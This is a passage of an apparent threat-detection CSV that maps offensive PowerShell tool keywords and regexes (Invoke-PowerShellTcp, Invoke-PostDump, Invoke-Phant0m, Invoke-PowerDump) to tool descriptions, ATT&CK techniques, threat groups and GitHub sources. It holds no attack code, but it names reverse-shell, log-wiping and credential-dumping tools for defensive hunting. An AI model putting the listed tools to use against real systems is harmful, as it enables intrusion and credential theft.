T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-Phant0m.ps1*",".{0,1000}Invoke\-Phant0m\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","10","10","27","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z" "*Invoke-Phant0m.ps1*",".{0,1000}Invoke\-Phant0m\.ps1.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1725","297","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*invoke-pipekat *",".{0,1000}invoke\-pipekat\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-Piper*",".{0,1000}Invoke\-Piper.{0,1000}","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/p3nt4/Invoke-Piper","1","1","N/A","N/A","3","293","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" 
"*Invoke-PiperClient*",".{0,1000}Invoke\-PiperClient.{0,1000}","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/p3nt4/Invoke-Piper","1","1","N/A","N/A","3","293","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" "*Invoke-PiperServer*",".{0,1000}Invoke\-PiperServer.{0,1000}","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/p3nt4/Invoke-Piper","1","1","N/A","N/A","3","293","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" "*Invoke-PipeShell.ps1*",".{0,1000}Invoke\-PipeShell\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-PortBind*",".{0,1000}Invoke\-PortBind.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Portscan*",".{0,1000}Invoke\-Portscan.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-PortScan*",".{0,1000}Invoke\-PortScan.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - 
T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*Invoke-Portscan*",".{0,1000}Invoke\-Portscan.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Portscan.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-PortScan*",".{0,1000}Invoke\-PortScan.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of 
scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-Portscan*",".{0,1000}Invoke\-Portscan.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-PortScan*",".{0,1000}Invoke\-PortScan.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Invoke-Portscan.ps1*",".{0,1000}Invoke\-Portscan\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - 
TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-Portscan.ps1*",".{0,1000}Invoke\-Portscan\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1081","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-PoshRatHttp*",".{0,1000}Invoke\-PoshRatHttp.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and 
commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*Invoke-PoshRatHttp*",".{0,1000}Invoke\-PoshRatHttp.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PoshRatHttp*",".{0,1000}Invoke\-PoshRatHttp.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PoshRatHttps*",".{0,1000}Invoke\-PoshRatHttps.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PoshRatHttps*",".{0,1000}Invoke\-PoshRatHttps.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PostDump*",".{0,1000}Invoke\-PostDump.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few techniques to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-PostExfil*",".{0,1000}Invoke\-PostExfil.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PostExfil.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-PostExfil*",".{0,1000}Invoke\-PostExfil.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1142","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-PowerDump*",".{0,1000}Invoke\-PowerDump.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*Invoke-PowerDump*",".{0,1000}Invoke\-PowerDump.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-PowerDump*",".{0,1000}Invoke\-PowerDump.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1057","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-PowerDump*",".{0,1000}Invoke\-PowerDump.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-PowerExtract*",".{0,1000}Invoke\-PowerExtract.{0,1000}","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. 
It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","2","106","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z" "*Invoke-PowerOptionsWMI*",".{0,1000}Invoke\-PowerOptionsWMI.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","8","791","142","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "*Invoke-PowerShellHistoryCheck*",".{0,1000}Invoke\-PowerShellHistoryCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-PowerShellIcmp*",".{0,1000}Invoke\-PowerShellIcmp.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PowerShellIcmp.ps1*",".{0,1000}Invoke\-PowerShellIcmp\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*Invoke-PowerShellIcmp.ps1*",".{0,1000}Invoke\-PowerShellIcmp\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PowerShellTcp*",".{0,1000}Invoke\-PowerShellTcp.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-PowerShellTcp*",".{0,1000}Invoke\-PowerShellTcp.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PowerShellTcp.ps1*",".{0,1000}Invoke\-PowerShellTcp\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-PowerShellTcp.ps1*",".{0,1000}Invoke\-PowerShellTcp\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*Invoke-PowerShellTcp.ps1*",".{0,1000}Invoke\-PowerShellTcp\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PowerShellTcpOneLine*",".{0,1000}Invoke\-PowerShellTcpOneLine.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
